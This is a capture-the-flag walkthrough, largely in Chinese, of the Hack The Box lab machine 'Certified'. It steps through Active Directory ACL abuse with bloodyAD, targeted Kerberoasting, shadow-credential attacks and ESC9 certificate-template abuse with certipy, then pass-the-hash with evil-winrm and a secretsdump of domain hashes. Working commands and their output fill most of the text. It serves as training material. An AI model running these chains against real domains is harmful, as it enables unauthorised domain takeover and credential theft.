Zumpyx Blog

Certified

Machines#633MediumWindows

Tags: WriteOwner、GenericWrite、GenericAll、ESC9、影子票据

As is common in Windows pentests, you will start the Certified box with credentials for the following 
account: Username: judith.mader Password: judith09

Recon & Enum

nmap -p- --min-rate 1000 -T4 -sC -sV -O -v Certified.htb
---
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-26 10:42:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2024-12-26T10:44:19+00:00; -1s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-26T10:44:18+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-12-26T10:44:18+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2024-12-26T10:44:18+00:00; -2s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49688/tcp open  msrpc         Microsoft Windows RPC
49695/tcp open  msrpc         Microsoft Windows RPC
49724/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
50575/tcp open  msrpc         Microsoft Windows RPC
bloodhound-python -c All --zip -d certified.htb -u judith.mader -p judith09 -ns $IP

Shell as Managemengt_SVC

image.png

# 先写入 owner 权限,如果不做这一步,后面会提示没有权限
bloodyAD --host certified.htb -u judith.mader -p judith09 -d certified.htb set owner Management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on Management

# 这个时候在修改 judith.mader 对 Management 的权限
bloodyAD --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader
---
[+] judith.mader has now GenericAll on Management

# 然后 judith.mader 可以把自己加入到 Management 组
bloodyAD --host certified.htb -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader
---
[+] judith.mader added to Management

# 这个时候可以尝试 SPN
targetedKerberoast -d certified.htb -u judith.mader -p judith09  
---
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (management_svc)
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$01f42c9d1ed01e299bb33be54007d926$4b2b552ca590b8b8d698c9394fb0d159c83018520483f31b09966934f129d293124b41f0543888d1e150b13b5338c1c81ee8ccfe29208482f2d1a3c727a44ddc090edd9968770a735867df164... 但是 hashcat 没爆破出来凭据

# 有了 GenericWrite 权限,可以利用影子凭据,这里 certipy-ad 会很方便,也可以使用 bloodyAD 结合 PKINITtools
certipy-ad shadow auto -u [email protected] -p judith09 -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ebc7f09f-ebaa-8672-80b2-ebf19f4afba4'
[*] Adding Key Credential with device ID 'ebc7f09f-ebaa-8672-80b2-ebf19f4afba4' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'ebc7f09f-ebaa-8672-80b2-ebf19f4afba4' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

![image.png](./assets/0633-certified/image 1.png)

Shell as Administrator

![image.png](./assets/0633-certified/image 2.png)

# 因为有了 GenericAll,所以可以尝试 SPN,或者直接利用影子凭据拿 NTLM Hash
certipy-ad shadow auto -u [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
---
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ec4860e4-5f93-5182-5928-143502c6b52d'
[*] Adding Key Credential with device ID 'ec4860e4-5f93-5182-5928-143502c6b52d' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID 'ec4860e4-5f93-5182-5928-143502c6b52d' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

certipy-ad find -vulnerable -u [email protected] -hashes b4b86f45c6018f1b664f70805f45d8f2 -ns $IP
--- cat 20241227103002_Certipy.txt
...
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
...
    [!] Vulnerabilities
      ESC9                              : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension

https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc9-no-security-extension

ESC9 需要对任一账户具有 GenericWrite 权限,目前拥有 ca_operator 的 GenericAll 权限也是满足的

# 把 management_svc 的用户主体改为 Administrator
certipy-ad account update -u [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator
---
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
    userPrincipalName                   : administrator
[*] Successfully updated 'ca_operator'

# 通过 ca_operator 请求证书,前面已经知道 NTLM Hash 了
certipy-ad req -u [email protected] -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca certified-DC01-CA -template CertifiedAuthentication
---
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

# 把 ca_operator 的 UPN 改回原来的值,原值一般都是自己
certipy-ad account update -u [email protected] -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn '[email protected]'
---
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
    userPrincipalName                   : [email protected]
[*] Successfully updated 'ca_operator'

现在使用这个证书进行身份验证,会在 UnPac 期间使用 Administrator 的 NTLM Hash

certipy-ad auth -pfx administrator.pfx -domain certified.htb
---
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34

![image.png](./assets/0633-certified/image 3.png)

More and More

很经典的 ESC 利用,对于熟悉证书的来讲应该是 Easy 难度,不熟悉的应该是 Hard 难度。

Dump Hash

impacket-secretsdump certified.htb/[email protected] -hashes :0d5b49608bbce1751f708748f67e2d34 -just-dc-ntlm
---
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:41c6e6d9e7fe3f175b42df14a3815969:::
certified.htb\judith.mader:1103:aad3b435b51404eeaad3b435b51404ee:8ec62ac86259004c121a7df4243a7a80:::
certified.htb\management_svc:1105:aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584:::
certified.htb\ca_operator:1106:aad3b435b51404eeaad3b435b51404ee:b4b86f45c6018f1b664f70805f45d8f2:::
certified.htb\alexander.huges:1601:aad3b435b51404eeaad3b435b51404ee:cde915082011eef6f107ab4384124983:::
certified.htb\harry.wilson:1602:aad3b435b51404eeaad3b435b51404ee:37a50354c4a799ace944d130ed34cd03:::
certified.htb\gregory.cameron:1603:aad3b435b51404eeaad3b435b51404ee:b7ef92685ee618fc477f6b7668a829af:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:8f3cbea3908ffcde111e6a077c37dac4:::
[*] Cleaning up...